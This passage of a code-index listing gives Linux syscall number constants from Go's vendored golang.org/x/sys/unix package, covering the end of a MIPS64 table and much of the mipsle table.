SYS_TGKILL = 5225 constant SYS_UTIMES (line 235) | SYS_UTIMES = 5226 constant SYS_MBIND (line 236) | SYS_MBIND = 5227 constant SYS_GET_MEMPOLICY (line 237) | SYS_GET_MEMPOLICY = 5228 constant SYS_SET_MEMPOLICY (line 238) | SYS_SET_MEMPOLICY = 5229 constant SYS_MQ_OPEN (line 239) | SYS_MQ_OPEN = 5230 constant SYS_MQ_UNLINK (line 240) | SYS_MQ_UNLINK = 5231 constant SYS_MQ_TIMEDSEND (line 241) | SYS_MQ_TIMEDSEND = 5232 constant SYS_MQ_TIMEDRECEIVE (line 242) | SYS_MQ_TIMEDRECEIVE = 5233 constant SYS_MQ_NOTIFY (line 243) | SYS_MQ_NOTIFY = 5234 constant SYS_MQ_GETSETATTR (line 244) | SYS_MQ_GETSETATTR = 5235 constant SYS_VSERVER (line 245) | SYS_VSERVER = 5236 constant SYS_WAITID (line 246) | SYS_WAITID = 5237 constant SYS_ADD_KEY (line 247) | SYS_ADD_KEY = 5239 constant SYS_REQUEST_KEY (line 248) | SYS_REQUEST_KEY = 5240 constant SYS_KEYCTL (line 249) | SYS_KEYCTL = 5241 constant SYS_SET_THREAD_AREA (line 250) | SYS_SET_THREAD_AREA = 5242 constant SYS_INOTIFY_INIT (line 251) | SYS_INOTIFY_INIT = 5243 constant SYS_INOTIFY_ADD_WATCH (line 252) | SYS_INOTIFY_ADD_WATCH = 5244 constant SYS_INOTIFY_RM_WATCH (line 253) | SYS_INOTIFY_RM_WATCH = 5245 constant SYS_MIGRATE_PAGES (line 254) | SYS_MIGRATE_PAGES = 5246 constant SYS_OPENAT (line 255) | SYS_OPENAT = 5247 constant SYS_MKDIRAT (line 256) | SYS_MKDIRAT = 5248 constant SYS_MKNODAT (line 257) | SYS_MKNODAT = 5249 constant SYS_FCHOWNAT (line 258) | SYS_FCHOWNAT = 5250 constant SYS_FUTIMESAT (line 259) | SYS_FUTIMESAT = 5251 constant SYS_NEWFSTATAT (line 260) | SYS_NEWFSTATAT = 5252 constant SYS_UNLINKAT (line 261) | SYS_UNLINKAT = 5253 constant SYS_RENAMEAT (line 262) | SYS_RENAMEAT = 5254 constant SYS_LINKAT (line 263) | SYS_LINKAT = 5255 constant SYS_SYMLINKAT (line 264) | SYS_SYMLINKAT = 5256 constant SYS_READLINKAT (line 265) | SYS_READLINKAT = 5257 constant SYS_FCHMODAT (line 266) | SYS_FCHMODAT = 5258 constant SYS_FACCESSAT (line 267) | SYS_FACCESSAT = 5259 constant SYS_PSELECT6 (line 268) | SYS_PSELECT6 = 5260 constant SYS_PPOLL (line 269) | SYS_PPOLL = 5261 constant SYS_UNSHARE (line 270) | SYS_UNSHARE = 5262 constant SYS_SPLICE (line 271) | SYS_SPLICE = 5263 constant SYS_SYNC_FILE_RANGE (line 272) | SYS_SYNC_FILE_RANGE = 5264 constant SYS_TEE (line 273) | SYS_TEE = 5265 constant SYS_VMSPLICE (line 274) | SYS_VMSPLICE = 5266 constant SYS_MOVE_PAGES (line 275) | SYS_MOVE_PAGES = 5267 constant SYS_SET_ROBUST_LIST (line 276) | SYS_SET_ROBUST_LIST = 5268 constant SYS_GET_ROBUST_LIST (line 277) | SYS_GET_ROBUST_LIST = 5269 constant SYS_KEXEC_LOAD (line 278) | SYS_KEXEC_LOAD = 5270 constant SYS_GETCPU (line 279) | SYS_GETCPU = 5271 constant SYS_EPOLL_PWAIT (line 280) | SYS_EPOLL_PWAIT = 5272 constant SYS_IOPRIO_SET (line 281) | SYS_IOPRIO_SET = 5273 constant SYS_IOPRIO_GET (line 282) | SYS_IOPRIO_GET = 5274 constant SYS_UTIMENSAT (line 283) | SYS_UTIMENSAT = 5275 constant SYS_SIGNALFD (line 284) | SYS_SIGNALFD = 5276 constant SYS_TIMERFD (line 285) | SYS_TIMERFD = 5277 constant SYS_EVENTFD (line 286) | SYS_EVENTFD = 5278 constant SYS_FALLOCATE (line 287) | SYS_FALLOCATE = 5279 constant SYS_TIMERFD_CREATE (line 288) | SYS_TIMERFD_CREATE = 5280 constant SYS_TIMERFD_GETTIME (line 289) | SYS_TIMERFD_GETTIME = 5281 constant SYS_TIMERFD_SETTIME (line 290) | SYS_TIMERFD_SETTIME = 5282 constant SYS_SIGNALFD4 (line 291) | SYS_SIGNALFD4 = 5283 constant SYS_EVENTFD2 (line 292) | SYS_EVENTFD2 = 5284 constant SYS_EPOLL_CREATE1 (line 293) | SYS_EPOLL_CREATE1 = 5285 constant SYS_DUP3 (line 294) | SYS_DUP3 = 5286 constant SYS_PIPE2 (line 295) | SYS_PIPE2 = 5287 constant SYS_INOTIFY_INIT1 (line 296) | SYS_INOTIFY_INIT1 = 5288 constant SYS_PREADV (line 297) | SYS_PREADV = 5289 constant SYS_PWRITEV (line 298) | SYS_PWRITEV = 5290 constant SYS_RT_TGSIGQUEUEINFO (line 299) | SYS_RT_TGSIGQUEUEINFO = 5291 constant SYS_PERF_EVENT_OPEN (line 300) | SYS_PERF_EVENT_OPEN = 5292 constant SYS_ACCEPT4 (line 301) | SYS_ACCEPT4 = 5293 constant SYS_RECVMMSG (line 302) | SYS_RECVMMSG = 5294 constant SYS_FANOTIFY_INIT (line 303) | SYS_FANOTIFY_INIT = 5295 constant SYS_FANOTIFY_MARK (line 304) | SYS_FANOTIFY_MARK = 5296 constant SYS_PRLIMIT64 (line 305) | SYS_PRLIMIT64 = 5297 constant SYS_NAME_TO_HANDLE_AT (line 306) | SYS_NAME_TO_HANDLE_AT = 5298 constant SYS_OPEN_BY_HANDLE_AT (line 307) | SYS_OPEN_BY_HANDLE_AT = 5299 constant SYS_CLOCK_ADJTIME (line 308) | SYS_CLOCK_ADJTIME = 5300 constant SYS_SYNCFS (line 309) | SYS_SYNCFS = 5301 constant SYS_SENDMMSG (line 310) | SYS_SENDMMSG = 5302 constant SYS_SETNS (line 311) | SYS_SETNS = 5303 constant SYS_PROCESS_VM_READV (line 312) | SYS_PROCESS_VM_READV = 5304 constant SYS_PROCESS_VM_WRITEV (line 313) | SYS_PROCESS_VM_WRITEV = 5305 constant SYS_KCMP (line 314) | SYS_KCMP = 5306 constant SYS_FINIT_MODULE (line 315) | SYS_FINIT_MODULE = 5307 constant SYS_GETDENTS64 (line 316) | SYS_GETDENTS64 = 5308 constant SYS_SCHED_SETATTR (line 317) | SYS_SCHED_SETATTR = 5309 constant SYS_SCHED_GETATTR (line 318) | SYS_SCHED_GETATTR = 5310 constant SYS_RENAMEAT2 (line 319) | SYS_RENAMEAT2 = 5311 constant SYS_SECCOMP (line 320) | SYS_SECCOMP = 5312 constant SYS_GETRANDOM (line 321) | SYS_GETRANDOM = 5313 constant SYS_MEMFD_CREATE (line 322) | SYS_MEMFD_CREATE = 5314 constant SYS_BPF (line 323) | SYS_BPF = 5315 constant SYS_EXECVEAT (line 324) | SYS_EXECVEAT = 5316 constant SYS_USERFAULTFD (line 325) | SYS_USERFAULTFD = 5317 constant SYS_MEMBARRIER (line 326) | SYS_MEMBARRIER = 5318 constant SYS_MLOCK2 (line 327) | SYS_MLOCK2 = 5319 constant SYS_COPY_FILE_RANGE (line 328) | SYS_COPY_FILE_RANGE = 5320 constant SYS_PREADV2 (line 329) | SYS_PREADV2 = 5321 constant SYS_PWRITEV2 (line 330) | SYS_PWRITEV2 = 5322 constant SYS_PKEY_MPROTECT (line 331) | SYS_PKEY_MPROTECT = 5323 constant SYS_PKEY_ALLOC (line 332) | SYS_PKEY_ALLOC = 5324 constant SYS_PKEY_FREE (line 333) | SYS_PKEY_FREE = 5325 constant SYS_STATX (line 334) | SYS_STATX = 5326 constant SYS_RSEQ (line 335) | SYS_RSEQ = 5327 constant SYS_IO_PGETEVENTS (line 336) | SYS_IO_PGETEVENTS = 5328 constant SYS_PIDFD_SEND_SIGNAL (line 337) | SYS_PIDFD_SEND_SIGNAL = 5424 constant SYS_IO_URING_SETUP (line 338) | SYS_IO_URING_SETUP = 5425 constant SYS_IO_URING_ENTER (line 339) | SYS_IO_URING_ENTER = 5426 constant SYS_IO_URING_REGISTER (line 340) | SYS_IO_URING_REGISTER = 5427 constant SYS_OPEN_TREE (line 341) | SYS_OPEN_TREE = 5428 constant SYS_MOVE_MOUNT (line 342) | SYS_MOVE_MOUNT = 5429 constant SYS_FSOPEN (line 343) | SYS_FSOPEN = 5430 constant SYS_FSCONFIG (line 344) | SYS_FSCONFIG = 5431 constant SYS_FSMOUNT (line 345) | SYS_FSMOUNT = 5432 constant SYS_FSPICK (line 346) | SYS_FSPICK = 5433 constant SYS_PIDFD_OPEN (line 347) | SYS_PIDFD_OPEN = 5434 constant SYS_CLONE3 (line 348) | SYS_CLONE3 = 5435 constant SYS_CLOSE_RANGE (line 349) | SYS_CLOSE_RANGE = 5436 constant SYS_OPENAT2 (line 350) | SYS_OPENAT2 = 5437 constant SYS_PIDFD_GETFD (line 351) | SYS_PIDFD_GETFD = 5438 constant SYS_FACCESSAT2 (line 352) | SYS_FACCESSAT2 = 5439 constant SYS_PROCESS_MADVISE (line 353) | SYS_PROCESS_MADVISE = 5440 constant SYS_EPOLL_PWAIT2 (line 354) | SYS_EPOLL_PWAIT2 = 5441 constant SYS_MOUNT_SETATTR (line 355) | SYS_MOUNT_SETATTR = 5442 constant SYS_QUOTACTL_FD (line 356) | SYS_QUOTACTL_FD = 5443 constant SYS_LANDLOCK_CREATE_RULESET (line 357) | SYS_LANDLOCK_CREATE_RULESET = 5444 constant SYS_LANDLOCK_ADD_RULE (line 358) | SYS_LANDLOCK_ADD_RULE = 5445 constant SYS_LANDLOCK_RESTRICT_SELF (line 359) | SYS_LANDLOCK_RESTRICT_SELF = 5446 constant SYS_PROCESS_MRELEASE (line 360) | SYS_PROCESS_MRELEASE = 5448 constant SYS_FUTEX_WAITV (line 361) | SYS_FUTEX_WAITV = 5449 constant SYS_SET_MEMPOLICY_HOME_NODE (line 362) | SYS_SET_MEMPOLICY_HOME_NODE = 5450 constant SYS_CACHESTAT (line 363) | SYS_CACHESTAT = 5451 constant SYS_FCHMODAT2 (line 364) | SYS_FCHMODAT2 = 5452 constant SYS_MAP_SHADOW_STACK (line 365) | SYS_MAP_SHADOW_STACK = 5453 constant SYS_FUTEX_WAKE (line 366) | SYS_FUTEX_WAKE = 5454 constant SYS_FUTEX_WAIT (line 367) | SYS_FUTEX_WAIT = 5455 constant SYS_FUTEX_REQUEUE (line 368) | SYS_FUTEX_REQUEUE = 5456 FILE: vendor/golang.org/x/sys/unix/zsysnum_linux_mipsle.go constant SYS_SYSCALL (line 9) | SYS_SYSCALL = 4000 constant SYS_EXIT (line 10) | SYS_EXIT = 4001 constant SYS_FORK (line 11) | SYS_FORK = 4002 constant SYS_READ (line 12) | SYS_READ = 4003 constant SYS_WRITE (line 13) | SYS_WRITE = 4004 constant SYS_OPEN (line 14) | SYS_OPEN = 4005 constant SYS_CLOSE (line 15) | SYS_CLOSE = 4006 constant SYS_WAITPID (line 16) | SYS_WAITPID = 4007 constant SYS_CREAT (line 17) | SYS_CREAT = 4008 constant SYS_LINK (line 18) | SYS_LINK = 4009 constant SYS_UNLINK (line 19) | SYS_UNLINK = 4010 constant SYS_EXECVE (line 20) | SYS_EXECVE = 4011 constant SYS_CHDIR (line 21) | SYS_CHDIR = 4012 constant SYS_TIME (line 22) | SYS_TIME = 4013 constant SYS_MKNOD (line 23) | SYS_MKNOD = 4014 constant SYS_CHMOD (line 24) | SYS_CHMOD = 4015 constant SYS_LCHOWN (line 25) | SYS_LCHOWN = 4016 constant SYS_BREAK (line 26) | SYS_BREAK = 4017 constant SYS_UNUSED18 (line 27) | SYS_UNUSED18 = 4018 constant SYS_LSEEK (line 28) | SYS_LSEEK = 4019 constant SYS_GETPID (line 29) | SYS_GETPID = 4020 constant SYS_MOUNT (line 30) | SYS_MOUNT = 4021 constant SYS_UMOUNT (line 31) | SYS_UMOUNT = 4022 constant SYS_SETUID (line 32) | SYS_SETUID = 4023 constant SYS_GETUID (line 33) | SYS_GETUID = 4024 constant SYS_STIME (line 34) | SYS_STIME = 4025 constant SYS_PTRACE (line 35) | SYS_PTRACE = 4026 constant SYS_ALARM (line 36) | SYS_ALARM = 4027 constant SYS_UNUSED28 (line 37) | SYS_UNUSED28 = 4028 constant SYS_PAUSE (line 38) | SYS_PAUSE = 4029 constant SYS_UTIME (line 39) | SYS_UTIME = 4030 constant SYS_STTY (line 40) | SYS_STTY = 4031 constant SYS_GTTY (line 41) | SYS_GTTY = 4032 constant SYS_ACCESS (line 42) | SYS_ACCESS = 4033 constant SYS_NICE (line 43) | SYS_NICE = 4034 constant SYS_FTIME (line 44) | SYS_FTIME = 4035 constant SYS_SYNC (line 45) | SYS_SYNC = 4036 constant SYS_KILL (line 46) | SYS_KILL = 4037 constant SYS_RENAME (line 47) | SYS_RENAME = 4038 constant SYS_MKDIR (line 48) | SYS_MKDIR = 4039 constant SYS_RMDIR (line 49) | SYS_RMDIR = 4040 constant SYS_DUP (line 50) | SYS_DUP = 4041 constant SYS_PIPE (line 51) | SYS_PIPE = 4042 constant SYS_TIMES (line 52) | SYS_TIMES = 4043 constant SYS_PROF (line 53) | SYS_PROF = 4044 constant SYS_BRK (line 54) | SYS_BRK = 4045 constant SYS_SETGID (line 55) | SYS_SETGID = 4046 constant SYS_GETGID (line 56) | SYS_GETGID = 4047 constant SYS_SIGNAL (line 57) | SYS_SIGNAL = 4048 constant SYS_GETEUID (line 58) | SYS_GETEUID = 4049 constant SYS_GETEGID (line 59) | SYS_GETEGID = 4050 constant SYS_ACCT (line 60) | SYS_ACCT = 4051 constant SYS_UMOUNT2 (line 61) | SYS_UMOUNT2 = 4052 constant SYS_LOCK (line 62) | SYS_LOCK = 4053 constant SYS_IOCTL (line 63) | SYS_IOCTL = 4054 constant SYS_FCNTL (line 64) | SYS_FCNTL = 4055 constant SYS_MPX (line 65) | SYS_MPX = 4056 constant SYS_SETPGID (line 66) | SYS_SETPGID = 4057 constant SYS_ULIMIT (line 67) | SYS_ULIMIT = 4058 constant SYS_UNUSED59 (line 68) | SYS_UNUSED59 = 4059 constant SYS_UMASK (line 69) | SYS_UMASK = 4060 constant SYS_CHROOT (line 70) | SYS_CHROOT = 4061 constant SYS_USTAT (line 71) | SYS_USTAT = 4062 constant SYS_DUP2 (line 72) | SYS_DUP2 = 4063 constant SYS_GETPPID (line 73) | SYS_GETPPID = 4064 constant SYS_GETPGRP (line 74) | SYS_GETPGRP = 4065 constant SYS_SETSID (line 75) | SYS_SETSID = 4066 constant SYS_SIGACTION (line 76) | SYS_SIGACTION = 4067 constant SYS_SGETMASK (line 77) | SYS_SGETMASK = 4068 constant SYS_SSETMASK (line 78) | SYS_SSETMASK = 4069 constant SYS_SETREUID (line 79) | SYS_SETREUID = 4070 constant SYS_SETREGID (line 80) | SYS_SETREGID = 4071 constant SYS_SIGSUSPEND (line 81) | SYS_SIGSUSPEND = 4072 constant SYS_SIGPENDING (line 82) | SYS_SIGPENDING = 4073 constant SYS_SETHOSTNAME (line 83) | SYS_SETHOSTNAME = 4074 constant SYS_SETRLIMIT (line 84) | SYS_SETRLIMIT = 4075 constant SYS_GETRLIMIT (line 85) | SYS_GETRLIMIT = 4076 constant SYS_GETRUSAGE (line 86) | SYS_GETRUSAGE = 4077 constant SYS_GETTIMEOFDAY (line 87) | SYS_GETTIMEOFDAY = 4078 constant SYS_SETTIMEOFDAY (line 88) | SYS_SETTIMEOFDAY = 4079 constant SYS_GETGROUPS (line 89) | SYS_GETGROUPS = 4080 constant SYS_SETGROUPS (line 90) | SYS_SETGROUPS = 4081 constant SYS_RESERVED82 (line 91) | SYS_RESERVED82 = 4082 constant SYS_SYMLINK (line 92) | SYS_SYMLINK = 4083 constant SYS_UNUSED84 (line 93) | SYS_UNUSED84 = 4084 constant SYS_READLINK (line 94) | SYS_READLINK = 4085 constant SYS_USELIB (line 95) | SYS_USELIB = 4086 constant SYS_SWAPON (line 96) | SYS_SWAPON = 4087 constant SYS_REBOOT (line 97) | SYS_REBOOT = 4088 constant SYS_READDIR (line 98) | SYS_READDIR = 4089 constant SYS_MMAP (line 99) | SYS_MMAP = 4090 constant SYS_MUNMAP (line 100) | SYS_MUNMAP = 4091 constant SYS_TRUNCATE (line 101) | SYS_TRUNCATE = 4092 constant SYS_FTRUNCATE (line 102) | SYS_FTRUNCATE = 4093 constant SYS_FCHMOD (line 103) | SYS_FCHMOD = 4094 constant SYS_FCHOWN (line 104) | SYS_FCHOWN = 4095 constant SYS_GETPRIORITY (line 105) | SYS_GETPRIORITY = 4096 constant SYS_SETPRIORITY (line 106) | SYS_SETPRIORITY = 4097 constant SYS_PROFIL (line 107) | SYS_PROFIL = 4098 constant SYS_STATFS (line 108) | SYS_STATFS = 4099 constant SYS_FSTATFS (line 109) | SYS_FSTATFS = 4100 constant SYS_IOPERM (line 110) | SYS_IOPERM = 4101 constant SYS_SOCKETCALL (line 111) | SYS_SOCKETCALL = 4102 constant SYS_SYSLOG (line 112) | SYS_SYSLOG = 4103 constant SYS_SETITIMER (line 113) | SYS_SETITIMER = 4104 constant SYS_GETITIMER (line 114) | SYS_GETITIMER = 4105 constant SYS_STAT (line 115) | SYS_STAT = 4106 constant SYS_LSTAT (line 116) | SYS_LSTAT = 4107 constant SYS_FSTAT (line 117) | SYS_FSTAT = 4108 constant SYS_UNUSED109 (line 118) | SYS_UNUSED109 = 4109 constant SYS_IOPL (line 119) | SYS_IOPL = 4110 constant SYS_VHANGUP (line 120) | SYS_VHANGUP = 4111 constant SYS_IDLE (line 121) | SYS_IDLE = 4112 constant SYS_VM86 (line 122) | SYS_VM86 = 4113 constant SYS_WAIT4 (line 123) | SYS_WAIT4 = 4114 constant SYS_SWAPOFF (line 124) | SYS_SWAPOFF = 4115 constant SYS_SYSINFO (line 125) | SYS_SYSINFO = 4116 constant SYS_IPC (line 126) | SYS_IPC = 4117 constant SYS_FSYNC (line 127) | SYS_FSYNC = 4118 constant SYS_SIGRETURN (line 128) | SYS_SIGRETURN = 4119 constant SYS_CLONE (line 129) | SYS_CLONE = 4120 constant SYS_SETDOMAINNAME (line 130) | SYS_SETDOMAINNAME = 4121 constant SYS_UNAME (line 131) | SYS_UNAME = 4122 constant SYS_MODIFY_LDT (line 132) | SYS_MODIFY_LDT = 4123 constant SYS_ADJTIMEX (line 133) | SYS_ADJTIMEX = 4124 constant SYS_MPROTECT (line 134) | SYS_MPROTECT = 4125 constant SYS_SIGPROCMASK (line 135) | SYS_SIGPROCMASK = 4126 constant SYS_CREATE_MODULE (line 136) | SYS_CREATE_MODULE = 4127 constant SYS_INIT_MODULE (line 137) | SYS_INIT_MODULE = 4128 constant SYS_DELETE_MODULE (line 138) | SYS_DELETE_MODULE = 4129 constant SYS_GET_KERNEL_SYMS (line 139) | SYS_GET_KERNEL_SYMS = 4130 constant SYS_QUOTACTL (line 140) | SYS_QUOTACTL = 4131 constant SYS_GETPGID (line 141) | SYS_GETPGID = 4132 constant SYS_FCHDIR (line 142) | SYS_FCHDIR = 4133 constant SYS_BDFLUSH (line 143) | SYS_BDFLUSH = 4134 constant SYS_SYSFS (line 144) | SYS_SYSFS = 4135 constant SYS_PERSONALITY (line 145) | SYS_PERSONALITY = 4136 constant SYS_AFS_SYSCALL (line 146) | SYS_AFS_SYSCALL = 4137 constant SYS_SETFSUID (line 147) | SYS_SETFSUID = 4138 constant SYS_SETFSGID (line 148) | SYS_SETFSGID = 4139 constant SYS__LLSEEK (line 149) | SYS__LLSEEK = 4140 constant SYS_GETDENTS (line 150) | SYS_GETDENTS = 4141 constant SYS__NEWSELECT (line 151) | SYS__NEWSELECT = 4142 constant SYS_FLOCK (line 152) | SYS_FLOCK = 4143 constant SYS_MSYNC (line 153) | SYS_MSYNC = 4144 constant SYS_READV (line 154) | SYS_READV = 4145 constant SYS_WRITEV (line 155) | SYS_WRITEV = 4146 constant SYS_CACHEFLUSH (line 156) | SYS_CACHEFLUSH = 4147 constant SYS_CACHECTL (line 157) | SYS_CACHECTL = 4148 constant SYS_SYSMIPS (line 158) | SYS_SYSMIPS = 4149 constant SYS_UNUSED150 (line 159) | SYS_UNUSED150 = 4150 constant SYS_GETSID (line 160) | SYS_GETSID = 4151 constant SYS_FDATASYNC (line 161) | SYS_FDATASYNC = 4152 constant SYS__SYSCTL (line 162) | SYS__SYSCTL = 4153 constant SYS_MLOCK (line 163) | SYS_MLOCK = 4154 constant SYS_MUNLOCK (line 164) | SYS_MUNLOCK = 4155 constant SYS_MLOCKALL (line 165) | SYS_MLOCKALL = 4156 constant SYS_MUNLOCKALL (line 166) | SYS_MUNLOCKALL = 4157 constant SYS_SCHED_SETPARAM (line 167) | SYS_SCHED_SETPARAM = 4158 constant SYS_SCHED_GETPARAM (line 168) | SYS_SCHED_GETPARAM = 4159 constant SYS_SCHED_SETSCHEDULER (line 169) | SYS_SCHED_SETSCHEDULER = 4160 constant SYS_SCHED_GETSCHEDULER (line 170) | SYS_SCHED_GETSCHEDULER = 4161 constant SYS_SCHED_YIELD (line 171) | SYS_SCHED_YIELD = 4162 constant SYS_SCHED_GET_PRIORITY_MAX (line 172) | SYS_SCHED_GET_PRIORITY_MAX = 4163 constant SYS_SCHED_GET_PRIORITY_MIN (line 173) | SYS_SCHED_GET_PRIORITY_MIN = 4164 constant SYS_SCHED_RR_GET_INTERVAL (line 174) | SYS_SCHED_RR_GET_INTERVAL = 4165 constant SYS_NANOSLEEP (line 175) | SYS_NANOSLEEP = 4166 constant SYS_MREMAP (line 176) | SYS_MREMAP = 4167 constant SYS_ACCEPT (line 177) | SYS_ACCEPT = 4168 constant SYS_BIND (line 178) | SYS_BIND = 4169 constant SYS_CONNECT (line 179) | SYS_CONNECT = 4170 constant SYS_GETPEERNAME (line 180) | SYS_GETPEERNAME = 4171 constant SYS_GETSOCKNAME (line 181) | SYS_GETSOCKNAME = 4172 constant SYS_GETSOCKOPT (line 182) | SYS_GETSOCKOPT = 4173 constant SYS_LISTEN (line 183) | SYS_LISTEN = 4174 constant SYS_RECV (line 184) | SYS_RECV = 4175 constant SYS_RECVFROM (line 185) | SYS_RECVFROM = 4176 constant SYS_RECVMSG (line 186) | SYS_RECVMSG = 4177 constant SYS_SEND (line 187) | SYS_SEND = 4178 constant SYS_SENDMSG (line 188) | SYS_SENDMSG = 4179 constant SYS_SENDTO (line 189) | SYS_SENDTO = 4180 constant SYS_SETSOCKOPT (line 190) | SYS_SETSOCKOPT = 4181 constant SYS_SHUTDOWN (line 191) | SYS_SHUTDOWN = 4182 constant SYS_SOCKET (line 192) | SYS_SOCKET = 4183 constant SYS_SOCKETPAIR (line 193) | SYS_SOCKETPAIR = 4184 constant SYS_SETRESUID (line 194) | SYS_SETRESUID = 4185 constant SYS_GETRESUID (line 195) | SYS_GETRESUID = 4186 constant SYS_QUERY_MODULE (line 196) | SYS_QUERY_MODULE = 4187 constant SYS_POLL (line 197) | SYS_POLL = 4188 constant SYS_NFSSERVCTL (line 198) | SYS_NFSSERVCTL = 4189 constant SYS_SETRESGID (line 199) | SYS_SETRESGID = 4190 constant SYS_GETRESGID (line 200) | SYS_GETRESGID = 4191 constant SYS_PRCTL (line 201) | SYS_PRCTL = 4192 constant SYS_RT_SIGRETURN (line 202) | SYS_RT_SIGRETURN = 4193 constant SYS_RT_SIGACTION (line 203) | SYS_RT_SIGACTION = 4194 constant SYS_RT_SIGPROCMASK (line 204) | SYS_RT_SIGPROCMASK = 4195 constant SYS_RT_SIGPENDING (line 205) | SYS_RT_SIGPENDING = 4196 constant SYS_RT_SIGTIMEDWAIT (line 206) | SYS_RT_SIGTIMEDWAIT = 4197 constant SYS_RT_SIGQUEUEINFO (line 207) | SYS_RT_SIGQUEUEINFO = 4198 constant SYS_RT_SIGSUSPEND (line 208) | SYS_RT_SIGSUSPEND = 4199 constant SYS_PREAD64 (line 209) | SYS_PREAD64 = 4200 constant SYS_PWRITE64 (line 210) | SYS_PWRITE64 = 4201 constant SYS_CHOWN (line 211) | SYS_CHOWN = 4202 constant SYS_GETCWD (line 212) | SYS_GETCWD = 4203 constant SYS_CAPGET (line 213) | SYS_CAPGET = 4204 constant SYS_CAPSET (line 214) | SYS_CAPSET = 4205 constant SYS_SIGALTSTACK (line 215) | SYS_SIGALTSTACK = 4206 constant SYS_SENDFILE (line 216) | SYS_SENDFILE = 4207 constant SYS_GETPMSG (line 217) | SYS_GETPMSG = 4208 constant SYS_PUTPMSG (line 218) | SYS_PUTPMSG = 4209 constant SYS_MMAP2 (line 219) | SYS_MMAP2 = 4210 constant SYS_TRUNCATE64 (line 220) | SYS_TRUNCATE64 = 4211 constant SYS_FTRUNCATE64 (line 221) | SYS_FTRUNCATE64 = 4212 constant SYS_STAT64 (line 222) | SYS_STAT64 = 4213 constant SYS_LSTAT64 (line 223) | SYS_LSTAT64 = 4214 constant SYS_FSTAT64 (line 224) | SYS_FSTAT64 = 4215 constant SYS_PIVOT_ROOT (line 225) | SYS_PIVOT_ROOT = 4216 constant SYS_MINCORE (line 226) | SYS_MINCORE = 4217 constant SYS_MADVISE (line 227) | SYS_MADVISE = 4218 constant SYS_GETDENTS64 (line 228) | SYS_GETDENTS64 = 4219 constant SYS_FCNTL64 (line 229) | SYS_FCNTL64 = 4220 constant SYS_RESERVED221 (line 230) | SYS_RESERVED221 = 4221 constant SYS_GETTID (line 231) | SYS_GETTID = 4222 constant SYS_READAHEAD (line 232) | SYS_READAHEAD = 4223 constant SYS_SETXATTR (line 233) | SYS_SETXATTR = 4224 constant SYS_LSETXATTR (line 234) | SYS_LSETXATTR = 4225 constant SYS_FSETXATTR (line 235) | SYS_FSETXATTR = 4226 constant SYS_GETXATTR (line 236) | SYS_GETXATTR = 4227 constant SYS_LGETXATTR (line 237) | SYS_LGETXATTR = 4228 constant SYS_FGETXATTR (line 238) | SYS_FGETXATTR = 4229 constant SYS_LISTXATTR (line 239) | SYS_LISTXATTR = 4230 constant SYS_LLISTXATTR (line 240) | SYS_LLISTXATTR = 4231 constant SYS_FLISTXATTR (line 241) | SYS_FLISTXATTR = 4232 constant SYS_REMOVEXATTR (line 242) | SYS_REMOVEXATTR = 4233 constant SYS_LREMOVEXATTR (line 243) | SYS_LREMOVEXATTR = 4234 constant SYS_FREMOVEXATTR (line 244) | SYS_FREMOVEXATTR = 4235 constant SYS_TKILL (line 245) | SYS_TKILL = 4236 constant SYS_SENDFILE64 (line 246) | SYS_SENDFILE64 = 4237 constant SYS_FUTEX (line 247) | SYS_FUTEX = 4238 constant SYS_SCHED_SETAFFINITY (line 248) | SYS_SCHED_SETAFFINITY = 4239 constant SYS_SCHED_GETAFFINITY (line 249) | SYS_SCHED_GETAFFINITY = 4240 constant SYS_IO_SETUP (line 250) | SYS_IO_SETUP = 4241 constant SYS_IO_DESTROY (line 251) | SYS_IO_DESTROY = 4242 constant SYS_IO_GETEVENTS (line 252) | SYS_IO_GETEVENTS = 4243 constant SYS_IO_SUBMIT (line 253) | SYS_IO_SUBMIT = 4244 constant SYS_IO_CANCEL (line 254) | SYS_IO_CANCEL = 4245 constant SYS_EXIT_GROUP (line 255) | SYS_EXIT_GROUP = 4246 constant SYS_LOOKUP_DCOOKIE (line 256) | SYS_LOOKUP_DCOOKIE = 4247 constant SYS_EPOLL_CREATE (line 257) | SYS_EPOLL_CREATE = 4248 constant SYS_EPOLL_CTL (line 258) | SYS_EPOLL_CTL = 4249 constant SYS_EPOLL_WAIT (line 259) | SYS_EPOLL_WAIT = 4250 constant SYS_REMAP_FILE_PAGES (line 260) | SYS_REMAP_FILE_PAGES = 4251 constant SYS_SET_TID_ADDRESS (line 261) | SYS_SET_TID_ADDRESS = 4252 constant SYS_RESTART_SYSCALL (line 262) | SYS_RESTART_SYSCALL = 4253 constant SYS_FADVISE64 (line 263) | SYS_FADVISE64 = 4254 constant SYS_STATFS64 (line 264) | SYS_STATFS64 = 4255 constant SYS_FSTATFS64 (line 265) | SYS_FSTATFS64 = 4256 constant SYS_TIMER_CREATE (line 266) | SYS_TIMER_CREATE = 4257 constant SYS_TIMER_SETTIME (line 267) | SYS_TIMER_SETTIME = 4258 constant SYS_TIMER_GETTIME (line 268) | SYS_TIMER_GETTIME = 4259 constant SYS_TIMER_GETOVERRUN (line 269) | SYS_TIMER_GETOVERRUN = 4260 constant SYS_TIMER_DELETE (line 270) | SYS_TIMER_DELETE = 4261 constant SYS_CLOCK_SETTIME (line 271) | SYS_CLOCK_SETTIME = 4262 constant SYS_CLOCK_GETTIME (line 272) | SYS_CLOCK_GETTIME = 4263 constant SYS_CLOCK_GETRES (line 273) | SYS_CLOCK_GETRES = 4264 constant SYS_CLOCK_NANOSLEEP (line 274) | SYS_CLOCK_NANOSLEEP = 4265 constant SYS_TGKILL (line 275) | SYS_TGKILL = 4266 constant SYS_UTIMES (line 276) | SYS_UTIMES = 4267 constant SYS_MBIND (line 277) | SYS_MBIND = 4268 constant SYS_GET_MEMPOLICY (line 278) | SYS_GET_MEMPOLICY = 4269 constant SYS_SET_MEMPOLICY (line 279) | SYS_SET_MEMPOLICY = 4270 constant SYS_MQ_OPEN (line 280) | SYS_MQ_OPEN = 4271 constant SYS_MQ_UNLINK (line 281) | SYS_MQ_UNLINK = 4272 constant SYS_MQ_TIMEDSEND (line 282) | SYS_MQ_TIMEDSEND = 4273 constant SYS_MQ_TIMEDRECEIVE (line 283) | SYS_MQ_TIMEDRECEIVE = 4274 constant SYS_MQ_NOTIFY (line 284) | SYS_MQ_NOTIFY = 4275 constant SYS_MQ_GETSETATTR (line 285) | SYS_MQ_GETSETATTR = 4276 constant SYS_VSERVER (line 286) | SYS_VSERVER = 4277 constant SYS_WAITID (line 287) | SYS_WAITID = 4278 constant SYS_ADD_KEY (line 288) | SYS_ADD_KEY = 4280 constant SYS_REQUEST_KEY (line 289) | 